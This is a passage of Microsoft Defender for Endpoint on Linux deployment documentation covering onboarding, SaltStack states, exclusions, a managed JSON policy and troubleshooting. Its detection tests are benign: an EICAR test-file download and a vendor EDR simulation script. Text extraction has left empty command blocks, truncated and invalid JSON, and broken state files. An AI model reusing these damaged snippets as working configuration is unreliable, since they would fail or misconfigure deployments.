2. Run MicrosoftDefenderATPOnboardingLinuxServer.py.
７ Note
To run this command, you must have python or python3 installed on the
device depending on the distro and version. If needed, see Step-by-step
Instructions for Installing Python on Linux .
７ Note
To onboard a device that was previously offboarded you must remove the
mdatp_offboard.json file located at /etc/opt/microsoft/mdatp.
If you're running RHEL 8.x or Ubuntu 20.04 or higher, you'll need to use python3 .
Bash
sudo python3 MicrosoftDefenderATPOnboardingLinuxServer.py
For the rest of distros and versions, you'll need to use python .
Bash
sudo python MicrosoftDefenderATPOnboardingLinuxServer.py
3. Verify that the device is now associated with your organization and reports a valid
organization identifier:
Bash

4. Check the health status of the product by running the following command. A
return value of true denotes that the product is functioning as expected:
Bash
mdatp health --field healthy
） Important
definitions. This may take up to a few minutes depending on the network
connectivity. During this time the above command returns a value of false .
You can check the status of the definition update using the following
command:
Bash
mdatp health --field definitions_status
Please note that you may also need to configure a proxy after completing the
initial installation. See Configure Defender for Endpoint on Linux for static
proxy discovery: Post-installation configuration.
5. Run an AV detection test to verify that the device is properly onboarded and
reporting to the service. Perform the following steps on the newly onboarded
device:
Ensure that real-time protection is enabled (denoted by a result of true from

running the following command):
Bash
If it isn't enabled, execute the following command:
Bash
mdatp config real-time-protection --value enabled
Open a Terminal window and execute the following command:

Bash
curl -o /tmp/eicar.com.txt https://secure.eicar.org/eicar.com.txt
The file should have been quarantined by Defender for Endpoint on Linux.
Use the following command to list all the detected threats:
Bash
mdatp threat list
6. Run an EDR detection test and simulate a detection to verify that the device is
properly onboarded and reporting to the service. Perform the following steps on
the newly onboarded device:
Verify that the onboarded Linux server appears in Microsoft Defender XDR. If
this is the first onboarding of the machine, it can take up to 20 minutes until
it appears.
Download and extract the script file to an onboarded Linux server and run
the following command: ./mde_linux_edr_diy.sh
After a few minutes, a detection should be raised in Microsoft Defender XDR.
Look at the alert details, machine timeline, and perform your typical
investigation steps.
Microsoft Defender for Endpoint package

external package dependencies
The mdatp RPM package requires "glibc >= 2.17", "audit", "policycoreutils",
"semanage" "selinux-policy-targeted", "mde-netfilter"
For RHEL6 the mdatp RPM package requires "audit", "policycoreutils", "libselinux",
"mde-netfilter"
For DEBIAN the mdatp package requires "libc6 >= 2.23", "uuid-runtime", "auditd",
"mde-netfilter"
For Mariner the mdatp package requires "attr", "audit", "diffutils", "libacl", "libattr",
"libselinux-utils", "selinux-policy", "policycoreutils", "mde-netfilter"

For DEBIAN the mde-netfilter package requires "libnetfilter-queue1", "libglib2.0-0"
For RPM the mde-netfilter package requires "libmnl", "libnfnetlink",
"libnetfilter_queue", "glib2"
For Mariner the mde-netfilter package requires "libnfnetlink", "libnetfilter_queue"
errors, you can manually download the prerequisite dependencies.

See Log installation issues for more information on how to find the automatically
generated log that is created by the installer when an error occurs.
How to migrate from Insiders-Fast to

Production channel
1. Uninstall the "Insiders-Fast channel" version of Defender for Endpoint on Linux.
Bash
sudo yum remove mdatp
2. Disable the Defender for Endpoint on Linux Insiders-Fast repo
Bash
sudo yum repolist
７ Note
The output should show "packages-microsoft-com-fast-prod".
Bash
sudo yum-config-manager --disable packages-microsoft-com-fast-prod
3. Redeploy Microsoft Defender for Endpoint on Linux using the "Production

channel".
Uninstallation
See Uninstall for details on how to remove Defender for Endpoint on Linux from client
devices.
See also
 Tip
Feedback

on Linux with Saltstack
Article • 02/21/2024
Applies to:

This article describes how to deploy Defender for Endpoint on Linux using Saltstack. A

Create Saltstack state files
Deployment
Reference
） Important

Before you get started, see the main Defender for Endpoint on Linux page for a
description of prerequisites and system requirements for the current software version.
In addition, for Saltstack deployment, you need to be familiar with Saltstack

administration, have Saltstack installed, configure the Master and Minions, and know
how to apply states. Saltstack has many ways to complete the same task. These
instructions assume availability of supported Saltstack modules, such as apt and
unarchive to help deploy the package. Your organization might use a different workflow.
Refer to the Saltstack documentation for details.
Saltstack is installed on at least one computer (Saltstack calls the computer as the
master).
The Saltstack master accepted the managed nodes (Saltstack calls the nodes as
minions) connections.
The Saltstack minions are able to resolve communication to the Saltstack master
(be default the minions try to communicate with a machine named 'salt').
Rung this ping test:
Bash
sudo salt '*' test.ping
The Saltstack master has a file server location where the Microsoft Defender for
Endpoint files can be distributed from (by default Saltstack uses the /srv/salt folder
as the default distribution point)

２ Warning


> Onboarding.


4. On the SaltStack Master, extract the contents of the archive to the SaltStack
Server's folder (typically /srv/salt ):
Bash
ls -l
Output
total 8
Bash
unzip WindowsDefenderATPOnboardingPackage.zip -d /srv/salt/mde
Output
inflating: /srv/salt/mde/mdatp_onboard.json
Create Saltstack state files

Create a SaltState state file in your configuration repository (typically /srv/salt ) that
applies the necessary states to deploy and onboard Defender for Endpoint.
Add the Defender for Endpoint repository and key, install_mdatp.sls :
Defender for Endpoint on Linux can be deployed from one of the following
channels (described as [channel]): insiders-fast, insiders-slow, or prod. Each of these
channels corresponds to a Linux software repository.
offered to your device. Devices in insiders-fast are the first ones to receive updates
and new features, followed later by insiders-slow and lastly by prod.
In order to preview new features and provide early feedback, we recommended

that you configure some devices in your enterprise to use either insiders-fast or
insiders-slow.
２ Warning
In the following commands, replace [distro] and [version] with your information.
７ Note
In case of Oracle Linux and Amazon Linux 2, replace [distro] with "rhel". For
Amazon Linux 2, replace [version] with "7". For Oracle utilize, replace [version]
with the version of Oracle Linux.
Bash
cat /srv/salt/install_mdatp.sls
Output
add_ms_repo:
pkgrepo.managed:
- humanname: Microsoft Defender Repository
{% if grains['os_family'] == 'Debian' %}
- name: deb [arch=amd64,armhf,arm64]
https://packages.microsoft.com/[distro]/[version]/[channel] [codename]
main
- dist: [codename]
- file: /etc/apt/sources.list.d/microsoft-[channel].list
- key_url: https://packages.microsoft.com/keys/microsoft.asc
- refresh: true
{% elif grains['os_family'] == 'RedHat' %}
- name: packages-microsoft-[channel]
- file: microsoft-[channel]
- baseurl:
https://packages.microsoft.com/[distro]/[version]/[channel]/
- gpgkey: https://packages.microsoft.com/keys/microsoft.asc
- gpgcheck: true
{% endif %}
Add the package installed state to install_mdatp.sls after the add_ms_repo state
as previously defined.
Output
install_mdatp_package:
pkg.installed:
- name: matp
- required: add_ms_repo
Add the onboarding file deployment to install_mdatp.sls after the

install_mdatp_package as previously defined.
Output
copy_mde_onboarding_file:
file.managed:
- name: /etc/opt/microsoft/mdatp/mdatp_onboard.json
- source: salt://mde/mdatp_onboard.json
- required: install_mdatp_package
The completed install state file should look similar to this output:
Output
add_ms_repo:
pkgrepo.managed:
- humanname: Microsoft Defender Repository
{% if grains['os_family'] == 'Debian' %}
- name: deb [arch=amd64,armhf,arm64]
https://packages.microsoft.com/[distro]/[version]/prod [codename] main
- dist: [codename]
- file: /etc/apt/sources.list.d/microsoft-[channel].list
- key_url: https://packages.microsoft.com/keys/microsoft.asc
- refresh: true
{% elif grains['os_family'] == 'RedHat' %}
- name: packages-microsoft-[channel]
- file: microsoft-[channel]
- baseurl: https://packages.microsoft.com/[distro]/[version]/[channel]/
- gpgkey: https://packages.microsoft.com/keys/microsoft.asc
- gpgcheck: true
{% endif %}
install_mdatp_package:
pkg.installed:
- name: matp
- required: add_ms_repo
copy_mde_onboarding_file:
file.managed:
- source: salt://mde/mdatp_onboard.json
- required: install_mdatp_package
Create a SaltState state file in your configuration repository (typically /srv/salt ) that
applies the necessary states to offboard and remove Defender for Endpoint. Before
using the offboarding state file, you need to download the offboarding package from
the Security portal and extract it in the same way you did the onboarding package. The
downloaded offboarding package is only valid for a limited period of time.
Create an Uninstall state file uninstall_mdapt.sls and add the state to remove the
mdatp_onboard.json file
Bash
cat /srv/salt/uninstall_mdatp.sls
Output
remove_mde_onboarding_file:
file.absent:
Add the offboarding file deployment to the uninstall_mdatp.sls file after the
remove_mde_onboarding_file state defined in the previous section.
Output
offboard_mde:
file.managed:
- name: /etc/opt/microsoft/mdatp/mdatp_offboard.json
- source: salt://mde/mdatp_offboard.json
Add the removal of the MDATP package to the uninstall_mdatp.sls file after the
offboard_mde state defined in the previous section.
Output
remove_mde_packages:
pkg.removed:
- name: mdatp
The complete uninstall state file should look similar to the following output:
Output
remove_mde_onboarding_file:
file.absent:
offboard_mde:
file.managed:
- name: /etc/opt/microsoft/mdatp/mdatp_offboard.json
- source: salt://mde/offboard/mdatp_offboard.json
remove_mde_packages:
pkg.removed:
- name: mdatp
Deployment
Now apply the state to the minions. The below command applies the state to machines
with the name that begins with mdetest .
Installation:
Bash
salt 'mdetest*' state.apply install_mdatp
） Important
minutes.
Validation/configuration:
Bash
salt 'mdetest*' cmd.run 'mdatp connectivity test'
Bash
salt 'mdetest*' cmd.run 'mdatp health'
Uninstallation:
Bash
salt 'mdetest*' state.apply uninstall_mdatp

For more information on how to find the automatically generated log that's created by
the installer when an error occurs, see Log installation issues.

Reference
SALT Project documentation
See also
 Tip
Feedback

Advanced deployment guidance for
Linux
Article • 11/29/2023
Applies to:

This article provides advanced deployment guidance for Microsoft Defender for
Endpoint on Linux. You get a brief summary of the deployment steps, learn about the
system requirements, then be guided through the actual deployment steps. You'll also
learn how to verify that the device has been correctly onboarded.
For information about Microsoft Defender for Endpoint capabilities, see Advanced
Microsoft Defender for Endpoint capabilities.
To learn about other ways to deploy Microsoft Defender for Endpoint on Linux, see:
Manual deployment
Puppet based deployment
Ansible based deployment
Deploy Defender for Endpoint on Linux with Chef
Deployment summary
Learn about the general guidance on a typical Microsoft Defender for Endpoint on Linux
deployment. The applicability of some steps is determined by the requirements of your
Linux environment.
1. Work with your Firewall, Proxy, and Networking admin.
2. Capture performance data from the endpoint.
７ Note
Consider doing the following optional items, even though they are not
Microsoft Defender for Endpoint specific, they tend to improve performance
in Linux systems.
3. (Optional) Check for filesystem errors 'fsck' (akin to chkdsk).
4. (Optional) Update storage subsystem drivers.
5. (Optional) Update nic drivers.
6. Confirm system requirements and resource recommendations are met.
7. Add your existing solution to the exclusion list for Microsoft Defender Antivirus.
8. Review important points about exclusions.
9. Create Device Groups.
10. Configure Microsoft Defender for Endpoint on Linux antimalware settings.
11. Download the Microsoft Defender for Endpoint on Linux onboarding package from
the Microsoft Defender portal.
12. Use Ansible, Puppet, or Chef to manage Microsoft Defender for Endpoint on Linux.
13. Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux.
14. Check resource utilization statistics and report on predeployment utilization

compared to post-deployment.
15. Verify communication with Microsoft Defender for Endpoint backend.
16. Investigate agent health issues.
17. Verify that you're able to get "Platform Updates" (agent updates).
18. Verify that you're able to get "Security Intelligence Updates" (signatures/definition
updates).
19. Test detections.
20. Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint
on Linux.
21. Troubleshooting High CPU utilization by ISVs, Linux apps, or scripts.
22. Uninstall your non-Microsoft solution.
1. Work with your Firewall, Proxy, and

Networking admin
Work with your Firewall, Proxy, and Networking admin to add the Microsoft Defender
for Endpoint URLs to the allowed list, and prevent it from being SSL inspected.
For more information, see, Troubleshoot cloud connectivity issues.
Network connectivity of Microsoft Defender for Endpoint

Use the following steps to check the network connectivity of Microsoft Defender for
Endpoint:
1. See Allow URLs for the Microsoft Defender for Endpoint traffic that are allowed for
the Microsoft Defender for Endpoint traffic.
2. If the Linux servers are behind a proxy, then set the proxy settings. For more
information, see Set up proxy settings.
3. Verify that the traffic isn't being inspected by SSL inspection (TLS inspection). This
is the most common network related issue when setting up Microsoft Defender
Endpoint, see Verify SSL inspection isn't being performed on the network traffic.
Step 1: Allow URLs for the Microsoft Defender for Endpoint traffic
1. Download the Microsoft Defender for Endpoint URL list for commercial
customers or the Microsoft Defender for Endpoint URL list for Gov/GCC/DoD
for a list of services and their associated URLs that your network must be able to
connect.
2. Under Geography column, ensure the following checkboxes are selected:
EU, or UK, or US
WW
(Blanks)
７ Note
You should ensure that there are no firewall or network filtering rules that
would deny access to these URLs. If there are, you may need to create an
allow rule specifically for them.
3. Work with the Firewall/Proxy/Networking admins to allow the relevant URLs.
Step 2: Set up proxy settings

If the Linux servers are behind a proxy, use the following settings guidance.
The following table lists the supported proxy settings:
ﾉ Expand table
Supported Not supported
Transparent proxy Proxy autoconfig (PAC, a type of authenticated proxy)
Manual static proxy Web proxy autodiscovery protocol (WPAD, a type of

configuration authenticated proxy)
Network connections
Full configuration profile
Static proxy configuration
Troubleshooting connectivity issues in static proxy scenario
Step 3: Verify SSL inspection isn't being performed on the network

traffic
To prevent man-in-the-middle attacks, all Microsoft Azure hosted traffic uses certificate
pinning. As a result, SSL inspections by major firewall systems aren't allowed. You have
to bypass SSL inspection for Microsoft Defender for Endpoint URLs.
Troubleshoot cloud connectivity issues
For more information, see Troubleshooting cloud connectivity issues for Microsoft
2. Capture performance data from the

endpoint
Capture performance data from the endpoints that have Defender for Endpoint
installed. This includes disk space availability on all mounted partitions, memory usage,
process list, and CPU usage (aggregate across all cores).
3. (Optional) Check for filesystem errors 'fsck'

(akin to chkdsk)
Any filesystem could end-up getting corrupt, so before installing any new software, it
would be good to install it on a healthy file system.
4. (Optional) Update storage subsystem drivers

Newer driver or firmware on a storage subsystem could help with performance and/or
reliability.
5. (Optional) Update nic drivers

Newer driver/firmware on a NICs or NIC teaming software could help w/ performance
and/or reliability.
6. Confirm system requirements and resource

recommendations are met
The following section provides information on supported Linux versions and
recommendations for resources.
For a detailed list of supported Linux distros, see System requirements.
ﾉ Expand table
Resource Recommendation
Disk Minimum: 2 GB
space NOTE: More disk space might be needed if cloud diagnostics are enabled for crash
collections.
RAM 1 GB
4 GB is preferred
CPU If the Linux system is running only one vcpu, we recommend it be increased to two
vcpu's
4 cores are preferred
ﾉ Expand table
OS version Kernel filter driver Comments
RHEL 7.x, RHEL 8.x, No kernel filter driver, the fanotify akin to Filter Manager (fltmgr,
and RHEL 9.x kernel option must be enabled accessible via fltmc.exe ) in Windows
OS version Kernel filter driver Comments
RHEL 6.x TALPA kernel driver
7. Add your existing solution to the exclusion

list for Microsoft Defender Antivirus
This step of the setup process involves adding Defender for Endpoint to the exclusion
list for your existing endpoint protection solution and any other security products your
organization is using. You can choose from several methods to add your exclusions to
 Tip
To get help configuring exclusions, refer to your solution provider's documentation.
Your ability to run Microsoft Defender for Endpoint on Linux alongside a non-
Microsoft antimalware product depends on the implementation details of that
product. If the other antimalware product uses fanotify, it has to be uninstalled to
eliminate performance and stability side effects resulting from running two
conflicting agents.
To check if there's a non-Microsoft antimalware that is running FANotify, you can

run mdatp health , then check the result:
Under "conflicting_applications", if you see a result other than "unavailable",
uninstall the non-Microsoft antimalware.
If you don't uninstall the non-Microsoft antimalware product, you might encounter
unexpected behaviors such as performance issues, stability issues such as systems
hanging, or kernel panics.
To identify the Microsoft Defender for Endpoint on Linux processes and paths that
should be excluded in the non-Microsoft antimalware product, run systemctl
status -l mdatp .
Exclude the following processes from the non-Microsoft antimalware product:
wdavdaemon
crashpad_handler
mdatp_audis_plugin
telemetryd_v2
Exclude the following paths from the non-Microsoft antimalware product:
/opt/microsoft/mdatp/
/var/opt/microsoft/mdatp/
/etc/opt/microsoft/mdatp/
8. Keep the following points about exclusions
in mind
When you add exclusions to Microsoft Defender Antivirus scans, you should add path
and process exclusions.
７ Note
Antivirus exclusions apply to the antivirus engine.

Indicators allow/block apply to the antivirus engine.
Keep the following points in mind:
Path exclusions exclude specific files and whatever those files access.
Process exclusions exclude whatever a process touches, but doesn't exclude the
process itself.
List your process exclusions using their full path and not by their name only. (The
name-only method is less secure.)
If you list each executable as both a path exclusion and a process exclusion, the
process and whatever it touches are excluded.
 Tip
Review "Common mistakes to avoid when defining exclusions", specifically Folder

locations and Processes the sections for Linux and macOS Platforms.
9. Create device groups

Set up your device groups, device collections, and organizational units Device groups,
device collections, and organizational units enable your security team to manage and
assign security policies efficiently and effectively. The following table describes each of
these groups and how to configure them. Your organization might not use all three
collection types.
ﾉ Expand table
Collection type What to do
Device groups (formerly called 1. Go to the Microsoft Defender portal

machine groups) enable your security (https://security.microsoft.com ).
operations team to configure security

capabilities, such as automated 2. In the navigation pane on the left, choose Settings >
investigation and remediation. Endpoints > Permissions > Device groups.
Device groups are also useful for 3. Choose + Add device group.
assigning access to those devices so
that your security operations team 4. Specify a name and description for the device group.
can take remediation actions if
needed. 5. In the Automation level list, select an option. (We
recommend Full - remediate threats automatically.) To
Device groups are created while the learn more about the various automation levels, see How
attack was detected and stopped, threats are remediated.
alerts, such as an "initial access alert,"
were triggered and appeared in the 6. Specify conditions for a matching rule to determine
Microsoft Defender portal. which devices belong to the device group. For example,
you can choose a domain, OS versions, or even use
device tags.
7. On the User access tab, specify roles that should have

access to the devices that are included in the device
group.
8. Choose Done.
Device collections enable your Follow the steps in Create a collection.

security operations team to manage
applications, deploy compliance
settings, or install software updates
on the devices in your organization.
Device collections are created by

using Configuration Manager.
Organizational units enable you to Follow the steps in Create an Organizational Unit in a
logically group objects such as user Microsoft Entra Domain Services managed domain.
accounts, service accounts, or
computer accounts.
You can then assign administrators to

specific organizational units, and
apply group policy to enforce
targeted configuration settings.
Organizational units are defined in

Microsoft Entra Domain Services.
10. Configure Microsoft Defender for Endpoint
on Linux antimalware settings
Before you begin:
If you're already using a non-Microsoft antimalware product for your Linux servers,
consider that you might have to copy the existing exclusions to Microsoft
If you're not using a non-Microsoft antimalware product for your Linux servers, get
a list of all your Linux applications and check the vendors website for exclusions.
If you're running a non-Microsoft antimalware product, add the processes/paths to

the Microsoft Defender for Endpoint's antivirus exclusion list. For more
information, check the non-Microsoft antimalware documentation or contact their
support.
If you're testing on one machine, you can use a command line to set up the
exclusions:
Configure from the command line.
Configure and validate exclusions for Microsoft Defender for Endpoint on Linux.
If you're testing on multiple machines, then use the following mdatp_managed.json

file. If you're coming from Windows, this like a 'group policy' for Defender for
Endpoint on Linux.
You can consider modifying the file based on your needs:
JSON
{
"antivirusEngine":{
"enforcementLevel":"real_time",
"scanAfterDefinitionUpdate":true,
"scanArchives":true,
"maximumOnDemandScanThreads":1,
"exclusionsMergePolicy":"merge",
"exclusions":[
{
"$type":"excludedPath",
"isDirectory":false,
"path":"/var/log/system.log"
},
{
"isDirectory":true,
"path":"/home"
},
{
"$type":"excludedFileExtension",
"extension":"pdf"
},
{
"$type":"excludedFileName",
"name":"cat"
}
],
"allowedThreats":[
"<EXAMPLE DO NOT USE>EICAR-Test-File (not a virus)"
],
"disallowedThreatActions":[
"allow",
"restore"
],
"threatTypeSettingsMergePolicy":"merge",
"threatTypeSettings":[
{
"key":"potentially_unwanted_application",
"value":"block"
},
{
"key":"archive_bomb",
"value":"audit"
}
]
},
"cloudService":{
"enabled":true,
"diagnosticLevel":"optional",
"automaticSampleSubmissionConsent":"safe",
"automaticDefinitionUpdateEnabled":true
"proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
}
}
Recommendations:
JSON
{
"antivirusEngine":{
"exclusions":[
{
"path":"/var/log/system.log"
},
{
"isDirectory":true,
"path":"/proc"
},
{
"isDirectory":true,
"path":"/sys"
},
{
"isDirectory":true,
"path":"/dev"
},
{
"extension":""
},
{
"name":""
}
],
"allowedThreats":[
""
],
"allow",
"restore"
],
{
"value":"block"
},
{
"value":"audit"
}
]
},
"cloudService":{
"enabled":true,
"automaticDefinitionUpdateEnabled":true
}
}
７ Note
In Linux (and macOS) we support paths where it starts with a wildcard.
The following table describes the settings that are recommended as part of
mdatp_managed.json file:
ﾉ Expand table
Settings Comments
exclusionsMergePolicy being set to Prevents the local admin from being able to add the
admin_only local exclusions (via bash (the command prompt)).
disallowedThreatActions being set to Prevents the local admin from being able to restore a
allow and restore quarantined item (via bash (the command prompt)).
threatTypeSettingsMergePolicy being Prevents the local admin from being able to add False
set to admin_only Positives or True Positives that are benign to the threat
types (via bash (the command prompt)).
Save the setting as mdatp_managed.json file.

Copy the setting to this path /etc/opt/microsoft/mdatp/managed/ . For more
information, see Set preferences for Microsoft Defender for Endpoint on Linux.
Add your non-Microsoft antimalware processes and paths to the exclusion list
from the prior step.
Verify that you've added your current exclusions from your non-Microsoft
antimalware solution to the prior step.
Applications that Microsoft Defender for Endpoint can

impact
High I/O workloads such as Postgres, OracleDB, Jira, and Jenkins might require other
exclusions, depending on the amount of activity that is being processed (and monitored
by Defender for Endpoint). It's best to follow guidance from non-Microsoft application
providers for their exclusions if you experience performance degradation after installing
Defender for Endpoint. Also keep in mind Common Exclusion Mistakes for Microsoft
Defender Antivirus.
If you experience performance degradation, see the following resources:
Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux.

Troubleshoot AuditD performance issues with Microsoft Defender for Endpoint on
Linux.
11. Download the Microsoft Defender for

Endpoint on Linux onboarding package
For more information, see download the onboarding package from Microsoft Defender
portal.
７ Note
This download registers Microsoft Defender for Endpoint on Linux to send the data
to your Microsoft Defender for Endpoint instance.
After downloading this package, you can follow the manual installation instructions or
use a Linux management platform to deploy and manage Defender for Endpoint on
Linux.
12. Ansible, Puppet, and Chef examples to

manage Microsoft Defender for Endpoint on
Linux
Defender for Endpoint on Linux is designed to allow almost any management solution
to easily deploy and manage Defender for Endpoint settings on Linux. A few common
Linux management platforms are Ansible, Puppet, and Chef. The following documents
contain examples on how to configure these management platforms to deploy and
configure Defender for Endpoint on Linux.
Deploy Microsoft Defender for Endpoint on Linux with Puppet
Deploy Microsoft Defender for Endpoint on Linux with Ansible
Deploy Microsoft Defender for Endpoint on Linux with Chef
７ Note
Reboots are NOT required after installing or updating Microsoft Defender for
Endpoint on Linux except when you're running auditD in immutable mode.
Deliver the scheduled scans cronjob setting
Schedule an antivirus scan using Anacron in Microsoft Defender for Endpoint on Linux.
For more information, see Schedule an antivirus scan using Anacron in Microsoft
Update Microsoft Defender for Endpoint on Linux agent

cronjob settings
Schedule an update of the Microsoft Defender for Endpoint on Linux. For more
information, see, Schedule an update of the Microsoft Defender for Endpoint on Linux.
13. Troubleshoot installation issues for

Learn how to troubleshoot issues that might occur during installation in Troubleshoot
installation issues for Microsoft Defender for Endpoint on Linux.
14. Check resource utilization statistics

Check performance statistics and compare to predeployment utilization compared to
post-deployment.
15. Verify communication with Microsoft

Defender for Endpoint backend
To verify the Microsoft Defender for Endpoint on Linux communication to the cloud with
the current network settings, run the following connectivity test from the command line:
Bash
The following image displays the expected output from the test:
For more information, see Connectivity validation.
16. Investigate agent health issues

Investigate agent health issues based on values returned when you run the mdatp
health command. For more information, see, Investigate agent health issues.
17. Verify that you're able to get platform

updates (agent updates)
To verify Microsoft Defender for Endpoint on Linux platform updates, run the following
command line:
Bash
sudo yum update mdatp
or
Bash
apt-get update mdatp
depending on your package manager.
For more information, see Device health and Microsoft Defender antimalware health
report .
To find the latest Broad channel release, visit What's new in Microsoft Defender for
Endpoint on Linux.
How to update Microsoft Defender for Endpoint on Linux
deliver new features. To update Microsoft Defender for Endpoint on Linux. For more
information, see Deploy updates for Microsoft Defender for Endpoint on Linux.
７ Note
If you have Redhat's Satellite (akin to WSUS in Windows), you can get the updated
packages from it.
 Tip
Automate the agent update on a monthly (Recommended) schedule by using a

Cron job. For more information, see schedule an update of the Microsoft
７ Note
Ideally you should include one of each type of Linux system you are running in the
Preview channel so that you are able to find compatibility, performance and
reliability issues before the build makes it into the Current channel.
２ Warning
18. Verify that you're able to get security

intelligence updates (signatures/definition
updates)
To verify Microsoft Defender for Endpoint on Linux signatures/definition updates, run
the following command line:
mdatp definitions update
For more information, see New device health reporting for Microsoft Defender
antimalware .
19. Test detections

To ensure that the device is correctly onboarded and reported to the service, run the
following detection test:
Antimalware detections:
Bash
curl -o /tmp/eicar.com.txt https://www.eicar.org/download/eicar.com.txt
If the detection doesn't show up, it could be that you have set "allowedThreats" to
allow in preferences via Ansible or Puppet.
Endpoint detection and response (EDR) detections: For more information, see
Experience Microsoft Defender for Endpoint through simulated attacks. If the
detection doesn't show up, then it could be that we're missing event or alerts in
portal. For more information, see Troubleshoot missing events or alerts issues for
For more information about unified submissions in Microsoft Defender XDR and
the ability to submit False Positives and False Negatives through the portal, see
Unified submissions in Microsoft Defender XDR now Generally Available! -
Microsoft Tech Community .
20. Troubleshoot missing events or alerts issues

for Microsoft Defender for Endpoint on Linux
For more information, see, Troubleshoot missing events or alerts issues for Microsoft
21. Troubleshoot High CPU utilization by ISVs,

Linux apps, or scripts
If you observe that third-party ISVs, internally developed Linux apps, or scripts run into
high CPU utilization, you take the following steps to investigate the cause.
1. Identify the thread or process that's causing the symptom.

2. Apply further diagnostic steps based on the identified process to address the issue.
Step 1: Identify the Microsoft Defender for Endpoint on

Linux thread causing the symptom
Use the following syntaxes to help identify the process that is causing CPU overhead:
To get Microsoft Defender for Endpoint process ID causing the issue, run:
Bash
sudo top -c
To get more details on Microsoft Defender for Endpoint process, run:
Bash
sudo ps ax --no-headings -T -o
user,pid,thcount,%cpu,sched,%mem,vsz,rss,tname,stat,start_time,time,ucm
d,command |sort -nrk 3|grep mdatp
To identify the specific Microsoft Defender for Endpoint thread ID causing the
highest CPU utilization within the process, run:
Bash
sudo ps -T -p <PID> >> Thread_with_highest_cpu_usage.log
The following table lists the processes that might cause a high CPU usage:
ﾉ Expand table
Process name Component used MDE engine used
wdavdaemon FANotify Antivirus & EDR
wdavdaemon unprivileged Antivirus engine
wdavdaemon edr EDR engine
mdatp_audisp_plugin audit framework (auditd) Audit log ingestion
Step 2: Apply further diagnostic steps based on the

identified process
Now that you've identified the process that is causing the high CPU usage, use the
corresponding diagnostic guidance in the following section.
For example, in the previous step, wdavdaemon unprivileged was identified as the
process that was causing high CPU usage. Based on the result, you can apply the
guidance to check the wdavdaemon unprivileged process.
Use the following table to troubleshoot high CPU utilization:
ﾉ Expand table
Process name Component Microsoft Steps
used Defender
for
Endpoint
engine
used
wdavdaemon FANotify Antivirus & - Download and run Microsoft Defender

EDR for Endpoint Client Analyzer. For more
information, see Run the client analyzer on
macOS or Linux.
- Collect diagnostic data using the Client

analyzer tool .
- Open a CSS support case with Microsoft.

For more information, see CSS security
support case.
wdavdaemon N/A Antivirus The following diagram shows the workflow

unprivileged engine and steps required in order to add
Antivirus exclusions.
General troubleshooting guidance

- If you have in-house apps/scripts or a
legitimate third-party app/script getting
flagged, Microsoft security researchers
analyze suspicious files to determine if
they're threats, unwanted applications, or
normal files. Submit files you think are
malware or files that you believe have been
incorrectly classified as malware by using
the unified submissions experience (for
more information, see Unified submissions
experience ) or File submissions .
- See troubleshoot performance issues for

- Download and run Microsoft Defender

for Endpoint Client Analyzer. For more
used Defender
for
Endpoint
engine
used
macOS or Linux.

analyzer tool .

support case.
wdavdaemon edr N/A EDR engine The following diagram shows the workflow
and steps to troubleshoot
wdavedaemon_edr process issues.
General troubleshooting guidance

- If you have in-house apps/scripts or a
legitimate third-party app/script getting
flagged, Microsoft security researchers
analyze suspicious files to determine if
they're threats, unwanted applications, or
normal files. Submit files you think are
malware or files that you believe are
incorrectly classified as malware by using
the unified submissions experience (for
more information, see Unified submissions
experience ) or File submissions .
- See troubleshoot performance issues for

- Download and run Microsoft Defender

for Endpoint Client Analyzer. For more
macOS or Linux.

analyzer tool .
used Defender
for
Endpoint
engine
used

support case.
mdatp_audisp_plugin Audit Audit log See Troubleshoot AuditD performance

framework ingestion issues with Microsoft Defender for
Endpoint on Linux.
22. Uninstall your non-Microsoft solution

If at this point you have:
Onboarded your organization's devices to Defender for Endpoint, and

Microsoft Defender Antivirus is installed and enabled,
Then your next step is to uninstall your non-Microsoft antivirus, antimalware, and
endpoint protection solution. When you uninstall your non-Microsoft solution, make
sure to update your configuration to switch from Passive Mode to Active if you set
Defender for Endpoint to Passive mode during the installation or configuration.
Diagnostic and troubleshooting resources

Troubleshoot Microsoft Defender for Endpoint on Linux installation issues.
Identify where to find detailed logs for installation issues.
Troubleshooting steps for environments without proxy or with transparent proxy.
Troubleshooting steps for environments with static proxy.
Collect diagnostic information.
Uninstall Defender for Endpoint on Linux.
Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux.
Troubleshoot AuditD performance issues with Microsoft Defender for Endpoint on
Linux.
Advanced Microsoft Defender for Endpoint

capabilities
Enhanced antimalware engine capabilities on Linux and macOS
Boost protection of Linux estate with behavior monitoring
７ Note
The behavior monitoring functionality complements existing strong content-

based capabilities, however you should carefully evaluate this feature in your
environment before deploying it broadly since enabling behavioral
monitoring consumes more resources and may cause performance issues.
Unified submissions in Microsoft Defender XDR
Introducing the new alert suppression experience
Announcing live response for macOS and Linux
References
Add a tag or group ID
Privacy for Microsoft Defender for Endpoint on Linux
 Tip
Feedback

Deployment guidance for Microsoft
Defender for Endpoint on Linux for SAP
Article • 01/17/2024
Applies to:

This article provides deployment guidance for Microsoft Defender for Endpoint on Linux
for SAP. This article includes recommended SAP OSS (Online Services System) notes, the
system requirements, prerequisites, important configuration settings, recommended
antivirus exclusions, and guidance on scheduling antivirus scans.
Conventional security defenses that have been commonly used to protect SAP systems
such as isolating infrastructure behind firewalls and limiting interactive operating system
logons are no longer considered sufficient to mitigate modern sophisticated threats. It's
essential to deploy modern defenses to detect and contain threats in real-time. SAP
applications unlike most other workloads require basic assessment and validation before
deploying Microsoft Defender for Endpoint. The Enterprise Security administrators
should contact the SAP Basis Team prior to deploying Defender for Endpoint. The SAP
Basis Team should be cross trained with a basic level of knowledge about Defender for
Endpoint.
Recommended SAP OSS Notes

2248916 - Which files and directories should be excluded from an antivirus scan
for SAP BusinessObjects Business Intelligence Platform products in Linux/Unix? -
SAP ONE Support Launchpad
1984459 - Which files and directories should be excluded from an antivirus scan
for SAP Data Services - SAP ONE Support Launchpad
2808515 - Installing security software on SAP servers running on Linux - SAP ONE
Support Launchpad
1730930 - Using antivirus software in an SAP HANA appliance - SAP ONE Support
Launchpad
1730997 - Unrecommended versions of antivirus software - SAP ONE Support
Launchpad
SAP Applications on Linux

SAP only supports Suse, Redhat, and Oracle Linux. Other distributions aren't
supported for SAP S4 or NetWeaver applications.
Suse 15.x, Redhat 8.x or 9.x and Oracle Linux 8.x are strongly recommended.
